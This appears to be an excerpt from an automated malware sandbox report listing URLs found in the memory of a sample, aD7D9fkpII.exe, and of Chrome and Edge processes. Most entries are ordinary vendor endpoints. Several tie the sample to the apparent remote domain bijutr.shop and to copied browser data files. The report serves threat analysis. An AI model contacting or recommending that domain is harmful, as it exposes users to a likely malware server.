                  Source: chrome.exe, 0000000B.00000003.2246911750.00001E9000FA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246517198.00001E90010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246163106.00001E9000ED8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246544163.00001E9000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246875021.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323457526.00001E90002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246857475.00001E9000ECC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247562461.00001E9001158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246624539.00001E90010A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247174729.00001E90003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246836265.00001E9000CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2246486743.00001E900108C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247628614.00001E900120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/PATENTS.txt
                  Source: chrome.exe, 0000000B.00000002.2326402992.00001E9000AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edg
                  Source: chrome.exe, 0000000B.00000002.2325886446.00001E900097C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
                  Source: chrome.exe, 0000000B.00000002.2326402992.00001E9000AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://redirector.gvt1.com/edgl/
                  Source: chrome.exe, 0000000B.00000002.2325747912.00001E9000904000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
                  Source: chrome.exe, 0000000B.00000002.2325951329.00001E90009AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/
                  Source: chrome.exe, 0000000B.00000002.2325951329.00001E90009AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://unisolated.invalid/H
                  Source: chrome.exe, 0000000B.00000002.2326402992.00001E9000AE4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.
                  Source: chrome.exe, 0000000B.00000002.2325825077.00001E9000950000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/update2/response
                  Source: chrome.exe, 0000000B.00000002.2326171667.00001E9000A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gstatic.com/generate_204
                  Source: aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326642438.00001E9000BD4000.00000004.00000800.00020000.00000000.sdmp, CTJWTJ.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/
                  Source: chrome.exe, 0000000B.00000002.2322716389.00001E9000098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
                  Source: chrome.exe, 0000000B.00000002.2323842066.00001E9000428000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326931175.00001E9000C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                  Source: chrome.exe, 0000000B.00000002.2322505965.00001E900001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/AddSession
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/Logout
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/MergeSession
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/OAuthLogin
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/RotateBoundCookies
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.html
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
                  Source: chrome.exe, 0000000B.00000002.2322744149.00001E90000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
                  Source: chrome.exe, 0000000B.00000002.2322744149.00001E90000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
                  Source: chrome.exe, 0000000B.00000002.2322744149.00001E90000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/setup/windows
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
                  Source: chrome.exe, 0000000B.00000002.2322716389.00001E9000098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/o/oauth2/revoke
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/oauth/multilogin
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                  Source: chrome.exe, 0000000B.00000002.2323842066.00001E9000428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.comcookie_controls_metadata
                  Source: chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4830
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/4966
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/5845
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/6574
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7161
                  Source: chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7162
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7246
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7308
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                  Source: chrome.exe, 0000000B.00000003.2239615933.00001E90007AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238074969.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2238934375.00001E90003E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326602638.00001E9000B8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.2393212450.000008C4002FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                  Source: chrome.exe, 0000000B.00000003.2262212583.00001E90002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                  Source: msedge.exe, 0000000F.00000002.2468439750.0000020723D8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://assets.msn.cn/resolver/
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://assets.msn.com/resolver/
                  Source: aD7D9fkpII.exe, 00000005.00000002.2770513290.000000000044D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop
                  Source: aD7D9fkpII.exe, 00000005.00000003.2102549962.0000000001585000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000003.2126241051.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000003.2150463417.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/
                  Source: aD7D9fkpII.exe, 00000005.00000003.2102593602.000000000158A000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000003.2102549962.0000000001585000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000003.2126241051.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000003.2150463417.00000000015AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop/op
                  Source: aD7D9fkpII.exe, 00000005.00000002.2770513290.00000000004DD000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shop23e5ea2dd5a
                  Source: aD7D9fkpII.exe, 00000005.00000002.2770513290.00000000005AC000.00000040.00000400.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2770513290.000000000047C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://bijutr.shopsh;
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://bit.ly/wb-precache
                  Source: aD7D9fkpII.exe, 00000005.00000002.2777956578.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.000000000433F000.00000004.00000020.00020000.00000000.sdmp, IW4WT2.5.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                  Source: aD7D9fkpII.exe, 00000005.00000002.2777956578.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.000000000433F000.00000004.00000020.00020000.00000000.sdmp, IW4WT2.5.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://browser.events.data.msn.cn/
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://browser.events.data.msn.com/
                  Source: 2cc80dabc69f58b6_1.16.drString found in binary or memory: https://c.msn.com/
                  Source: chrome.exe, 0000000B.00000002.2324075991.00001E9000500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2327476732.00001E9000D9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325083176.00001E9000754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                  Source: chrome.exe, 0000000B.00000002.2326642438.00001E9000BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                  Source: aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, CTJWTJ.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: chrome.exe, 0000000B.00000002.2326642438.00001E9000BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icormat
                  Source: offscreendocument_main.js.16.dr, service_worker_bin_prod.js.16.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mathjax/
                  Source: chrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                  Source: chrome.exe, 0000000B.00000002.2324994448.00001E9000730000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                  Source: aD7D9fkpII.exe, 00000005.00000002.2774860542.000000000473B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, Web Data.16.dr, 47GLNG.5.dr, CTJWTJ.5.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: chrome.exe, 0000000B.00000002.2326552047.00001E9000B78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                  Source: chrome.exe, 0000000B.00000002.2326552047.00001E9000B78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                  Source: chrome.exe, 0000000B.00000002.2326552047.00001E9000B78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                  Source: aD7D9fkpII.exe, 00000005.00000002.2774860542.000000000473B000.00000004.00000020.00020000.00000000.sdmp, aD7D9fkpII.exe, 00000005.00000002.2773834918.0000000004373000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2323842066.00001E9000428000.00000004.00000800.00020000.00000000.sdmp, Web Data.16.dr, 47GLNG.5.dr, CTJWTJ.5.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: chrome.exe, 0000000B.00000003.2247463399.00001E900033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2324679295.00001E90006B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.2472336978.000008C40017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                  Source: manifest.json.16.drString found in binary or memory: https://chrome.google.com/webstore/
                  Source: chrome.exe, 0000000B.00000002.2324679295.00001E90006B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                  Source: chrome.exe, 0000000B.00000002.2324710834.00001E90006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2325780831.00001E9000924000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2328840965.00001E9001154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326743782.00001E9000C24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2326171667.00001E9000A28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: chrome.exe, 0000000B.00000003.2240514127.00001E9000CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2248094599.00001E9000CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2245166696.00001E9000CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2252201096.00001E9000CD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2240444511.00001E9000CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2242894398.00001E9000CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247490171.00001E9000CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2247463399.00001E900033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                  Source: chrome.exe, 0000000B.00000002.2338391369.0000686000920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                  Source: chrome.exe, 0000000B.00000003.2230479936.0000686000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2230318746.000068600071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                  Source: chrome.exe, 0000000B.00000002.2338391369.0000686000920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                  Source: chrome.exe, 0000000B.00000003.2230479936.0000686000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2230318746.000068600071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                  Source: chrome.exe, 0000000B.00000002.2338391369.0000686000920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                  Source: chrome.exe, 0000000B.00000003.2276055136.00001E90017CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2276701184.00001E90017D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000002.2338391369.0000686000920000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2274197468.00001E9001D28000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                  Source: chrome.exe, 0000000B.00000003.2230479936.0000686000728000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2273146066.00001E90016A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2230318746.000068600071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                  Source: chrome.exe, 0000000B.00000002.2323227457.00001E900020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                  Source: chrome.exe, 0000000B.00000002.2322505965.00001E900000C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.2472336978.000008C40017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.16.drString found in binary or memory: https://chromewebstore.google.com/
                  Source: chrome.exe, 0000000B.00000002.2326895111.00001E9000C70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                  Source: chrome.exe, 0000000B.00000002.2323163244.00001E90001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g
                  Source: fa201b82-10e8-4a2b-8d09-ec16cd71c292.tmp.18.dr, 6af7d95f-d76a-45be-917e-a577a06ee000.tmp.18.drString found in binary or memory: https://clients2.google.com
                  Source: chrome.exe, 0000000B.00000003.2226685513.000025B4002E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000B.00000003.2226667602.000025B4002D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
